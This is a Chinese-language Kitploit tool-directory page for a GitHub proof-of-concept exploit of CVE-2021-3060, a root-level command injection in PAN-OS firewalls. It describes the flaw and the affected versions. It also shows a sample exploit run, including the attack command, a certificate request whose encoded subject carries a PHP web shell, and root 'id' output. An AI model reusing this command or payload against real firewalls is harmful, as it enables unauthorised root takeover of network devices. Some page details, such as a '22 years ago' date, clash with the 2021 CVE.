Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-3060 — CVE-2021-3060 | Kitploit
工具/GitHubGitHub/anmolksachan/cve-2021-3060
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制Payload 开发
GitHubanmolksachan/cve-2021-3060

CVE-2021-3060

CVE-2021-3060

查看仓库
22年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
网站
分享

CVE-2021-3060 POC/漏洞利用

描述:

PAN-OS 软件的简单证书注册协议(SCEP)功能中存在一个操作系统命令注入漏洞,允许未经身份验证的网络攻击者(只要知道防火墙配置)以 root 用户权限执行任意代码。攻击者必须能够访问 GlobalProtect 接口才能利用此问题。该漏洞影响:早于 PAN-OS 8.1.20-h1 的 PAN-OS 8.1 版本;早于 PAN-OS 9.0.14-h3 的 PAN-OS 9.0 版本;早于 PAN-OS 9.1.11-h2 的 PAN-OS 9.1 版本;早于 PAN-OS 10.0.8 的 PAN-OS 10.0 版本;早于 PAN-OS 10.1.3 的 PAN-OS 10.1 版本。Prisma Access 2.1 Preferred 和 Prisma Access 2.1 Innovation 防火墙的 Prisma Access 客户也受到影响。

弱点:

CWE-78

链接:

https://nvd.nist.gov/vuln/detail/CVE-2021-3060

示例输出:

root@kitploit:~
$ python3 cve-2021-3060.py http://panw.local test-scep-profile
Certificate Request:
    Data:
        Version: 0 (0x0)
        Subject: serialNumber=test, CN=uid=99(nobody) gid=99(nobody) groups=99(nobody)
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (512 bit)
                Modulus:
                    00:be:e2:cc:14:7e:94:ef:5d:59:1c:3b:17:92:c0:
                    34:ce:10:67:c7:c4:26:24:f1:52:b4:65:c7:a6:68:
                    c4:2b:ef:99:7c:f8:53:c3:ad:0b:f0:d0:8e:f2:62:
                    94:52:4c:1b:bb:c9:47:63:35:1b:f3:f6:fe:1b:f4:
                    d9:45:44:64:93
                Exponent: 65537 (0x10001)
        Attributes:
            challengePassword        :challenge
    Signature Algorithm: sha256WithRSAEncryption
         a9:c1:56:6d:86:4f:3e:d6:5a:99:33:37:f6:40:a6:7d:19:0c:
         63:3d:a2:bd:d1:45:e9:f2:50:b3:3c:65:fc:a7:9b:3e:81:64:
         d1:96:99:d6:f4:9b:a2:ed:3c:5d:da:ec:bb:69:55:e0:fc:59:
         53:30:3f:a7:ed:d6:71:da:a6:7e
-----BEGIN CERTIFICATE REQUEST-----
MIIBCTCBtAIBADA1MQ0wCwYDVQQFEwR0ZXN0MSQwIgYDVQQDFBs8P3BocCBwYXNz
dGhydSgkX0dFVFswXSk7Pz4wXDANBgkqhkiG9w0BAQEFAANLADBIAkEAvuLMFH6U
711ZHDsXksA0zhBnx8QmJPFStGXHpmjEK++ZfPhTw60L8NCO8mKUUkwbu8lHYzUb
8/b+G/TZRURkkwIDAQABoBowGAYJKoZIhvcNAQkHMQsTCWNoYWxsZW5nZTANBgkq
hkiG9w0BAQsFAANBAKnBVm2GTz7WWpkzN/ZApn0ZDGM9or3RRenyULM8Zfynmz6B
ZNGWmdb0m6LtPF3a7LtpVeD8WVMwP6ft1nHapn4=
-----END CERTIFICATE REQUEST-----

uid=0(root) gid=0(root) groups=0(root)

注意:该脚本是从 https://gist.github.com/rqu1/8ed4f51fd90dd82fc89111340e26a756 更新的版本,并使用 Python 3。

下载工具